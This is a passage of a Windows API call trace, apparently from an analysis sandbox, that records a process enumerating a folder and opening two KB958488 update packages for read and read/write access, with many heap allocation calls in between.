hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.351] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.351] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.351] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x5b8e5700, ftLastWriteTime.dwHighDateTime=0x1cac6d1, nFileSizeHigh=0x0, nFileSizeLow=0x4db1ce, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Windows6.1-KB958488-v6001-x64.msu", cAlternateFileName="WINDOW~3.MSU")) returned 1 [0082.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0082.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0082.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0082.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0082.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0082.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0082.352] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0082.352] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0082.352] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0082.352] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0082.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.352] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.352] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0082.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0082.352] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0082.352] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0082.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0082.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0082.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0082.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0082.352] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0082.352] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0082.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0082.352] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0082.352] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.352] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.352] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.352] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.352] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0082.352] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0082.352] AreFileApisANSI () returned 1 [0082.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu", lpUsedDefaultChar=0x0) returned 56 [0082.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0082.352] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.352] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.353] AreFileApisANSI () returned 1 [0082.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0082.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0082.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x75f30, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 56 [0082.353] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.353] GetFileType (hFile=0x428) returned 0x1 [0082.353] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0082.353] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.353] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.353] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.354] CloseHandle (hObject=0x428) returned 1 [0082.354] AreFileApisANSI () returned 1 [0082.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0082.354] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0082.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 56 [0082.354] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.354] GetFileType (hFile=0x428) returned 0x1 [0082.354] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0082.354] CloseHandle (hObject=0x428) returned 1 [0082.354] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0082.354] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0082.354] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0082.354] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0082.354] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0082.354] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0082.354] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0082.354] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0082.355] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0082.355] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0082.355] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0082.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0082.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0082.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0082.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0082.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0082.355] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0082.355] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0082.355] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0082.355] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0082.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0082.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0082.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0082.355] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0082.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0082.355] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0082.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0082.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0082.355] AreFileApisANSI () returned 1 [0082.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0082.355] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0082.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 56 [0082.355] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x5b8e5700, ftLastWriteTime.dwHighDateTime=0x1cac6d1, nFileSizeHigh=0x0, nFileSizeLow=0x4db1ce)) returned 1 [0082.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0082.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0082.355] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.355] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.355] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 1 [0082.355] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.355] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0082.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0082.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0082.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0082.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0082.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0082.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0082.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0082.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0082.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0082.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0082.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0082.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0082.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0082.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0082.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0082.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0082.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0082.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0082.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0082.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0082.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0082.356] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.356] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.356] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.356] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0082.356] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0082.356] AreFileApisANSI () returned 1 [0082.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu", lpUsedDefaultChar=0x0) returned 56 [0082.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0082.357] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.357] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.357] AreFileApisANSI () returned 1 [0082.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0082.357] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0082.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 56 [0082.357] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.357] GetFileType (hFile=0x428) returned 0x1 [0082.357] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0082.357] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.357] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.358] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.358] CloseHandle (hObject=0x428) returned 1 [0082.358] AreFileApisANSI () returned 1 [0082.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0082.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0082.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 56 [0082.358] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.358] GetFileType (hFile=0x428) returned 0x1 [0082.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0082.358] CloseHandle (hObject=0x428) returned 1 [0082.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0082.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0082.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0082.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0082.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0082.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0082.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0082.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0082.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0082.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0082.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0082.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0082.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0082.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0082.359] AreFileApisANSI () returned 1 [0082.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0082.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0082.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 56 [0082.359] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9)) returned 1 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.359] HeapFree (in: hHeap=0x20000, 